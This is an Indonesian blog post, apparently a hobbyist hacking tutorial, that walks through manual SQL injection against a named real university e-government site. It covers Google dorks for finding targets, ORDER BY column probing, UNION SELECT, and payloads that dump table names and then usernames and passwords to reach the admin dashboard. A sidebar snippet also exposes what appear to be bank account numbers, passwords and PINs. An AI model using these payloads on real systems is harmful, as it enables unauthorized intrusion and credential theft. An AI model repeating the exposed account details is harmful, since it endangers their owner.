Skip to main content

Sql Manual

Hai sob,jumpa lagi ma aye kali ini kita coba bahas sql manual sob,ok lah kita langsung aja ea:)
Dork:
inurl:index.php?id=
inurl:trainers.php?id
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:games.php?id=
inurl:curriculum.php?id=
inurl:iniziativa.php?in=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php.id=


Dorkinglah di google dengan dork dork tadi sob,misalnya kita nemu web targetnya
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=431
Kita cara cek vuln sql atau tidak kita tinggal tambahin(')diujung link jadi seperti ini
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=431'
Ntar kalo blank atau muncul tulisan you have an error in your sql syntax berarti vuln.Trus kalo dah nemu web vulnnya kita dump pake perintah
+order+by+--+--
Taruh dibelakang link jadi gini
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=431+order+by+1--+--
Jika gak blank/eror berarti d tambahin 1 ampe nemu error/blanknya misal web ini nemu error diangka 28
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=431+order+by+28--+--
Berarti disini jumlah tabel pada data basenya ada 27
Nah kalo udah ketemu jumlah tabelnya kita dump dengan perintah


+union+select(jumlah tabel)-- tapi sebelum angka kasih tanda(-) tanpa tanda kurung.jadi linknya seperti ini
http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=-431+union+select+1+2+3+4+5+6+7+8+9+10+11+12+13+14+15+16+17+18+19+20+21+22+23+24+25+26+27--

Nah kalau udah pasti keluar angka keramatnya.Disini yang keluar adalah angka 9 jadi tabel itulah yang sekiranya dimasukan perintah selanjutnya.Dengan syarat angka 9 tadi dihapus dengan perintah selanjutnya adalah

(select+export_set(5,@;=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,ox3c6c693e,2),column_name,oxa3a,2))@,2))

Maka linknya menjadi

http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=-431+union+select+1+2+3+4+5+6+7+8,select+expor t_set(5,@;=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,ox3c6c693e,2),column_name,oxa3a,2))@,2)),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--


Kalo dah nemu nama nama tabelnya,nah disini kita cari yang berhubungan dengan username dan pasword,maka kita cari user dan pasword dengan perintah:

(select(@x)from(select(@x:=oxoo),(select(@x)from(nama tabel)where(@x)in(@x:=concat(ox20,@x,ox3c62723e,yang mau dicari,ox203a3a20,yang mau dicari))))x)

Berhubung yang kita cari username dan pasword maka kita buat perintah like this

(select(@x)from(select(@x:=oxoo),(select(@x)from(user)where(@x)in(ox:=concat(ox20,@x,ox3c62723e,username,ox203a3a20,pasword))))x)

Maka di link kita tulis menjadi

http://egovbench.addi.is.its.ac.id/detail.php?id_pemda=-431+union+select+1+2+3+4+5+6+7+8,(select(@x)from(select(@x:=oxoo),(select(@x)from(user)where(@x)in(@x:=concat(ox20,@x,ox3c62723e,username,ox203a3a20,pasword))))x),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

Nantu muncul username dan pasword webnya tinggal cari admin loginnya.Jika sudah benar ntar langsung menuju dashboard admin webnya,ok cukup segitu aja ea sob,jika ada yang kurang aye mohon maaf ea

Comments

Post a Comment

Popular posts from this blog

Catatanku

super no rek 000002288298 pin 123321 Nobu pw Joel1981 pin 000111 krom no rek 7700 6668 6787 102050 Pw Hondabeat81 Saqu no rek 10063536337 pw 112233 Hondabeat81 seabank no rek 901473290593 pw joel1981 pin 232425
Post a Comment
Read more

Ibu ....kau malaikatku

Percakapan allah dengan bayi sebelum terlahir kedunia Suatu ketika seorang bayi siap dilahirkan kedunia menjelang diturunkan...Dia bertanya kepada allah: Bayi:"para malaikat disini mengatakan,bahwa besok engkau akan mengirimku kedunia,tetapi...bagaimana cara saya hidup disana,saya begitu kecil dan lemah" Allah:"aku tlah memilih satu malaikat untukmu,ia akan menjagamu dan mengasihimu" Bayi:"tapi disurga apa yang saya lakukan hanyalah bernyanyi dan tertawa ini cukup bagi saya untuk bahagi" Allah:"malaikatmu akan bernyanyi dan tersenyum untukmu setiap hari ,dan kau akan merasakan kehangatan cintanya dan lebih bahagi" Bayi:"dan apa yang saya lakukan saya ingin berbicara kepadamu?" Allah:"malaikatmu akan mengajarkanmu bagaimana cara berdoa" Bayi:"saya mendengar bahwa dibumi banyak orang jahat,siapa yang akan melindungiku?" Allah:"malaikatmu akan melindungimu,dengan taruhan jiwa sekalipun" Bayi:"...
Post a Comment
Read more

Jim Geovedi

JIM GEOVEDI Assalamualaikum kali ini aye cuma mau share artikel the legend kita kak,jim geovedi kak,cuma pengen berbagi informasi tentang dia aja kak Jim Geovedi (lahir 28 juni 1979)adalah seorang pakar keamanan teknologi informasi ternama asal Indonesia yg berfokus pada penemuan celah keamanan komputer dan jaringan dengan kekhususan sistem telekomunikasi maupun satelit. . keaman Lahir 28juni 1979 Tempat tinggal Britania Raya Warganegara Indonesia Dikenal atas keamanan Komputer Karir keamanan informasi Pada tahun 1998-1999 setelah lulus SMA geovedi menjalan kehidupan jalanan yang keras di Bandar Lampung sebagai seniman grafis.Setelah seorang pendeta memperkenalkannyab dengan komputer dan internet,ia mulai belajar secara otodidak dan menelusuri ruang obrolan para peretas ternama dunia Tahun 2001 Geovedi mendirikan C2PRO Consulting.Perusahaan konsulting TI umum untuk lembaga pemerintahan konsultan keamanan TI Bellua Asia Pasific pada tahun 2004 Kem...
Post a Comment
Read more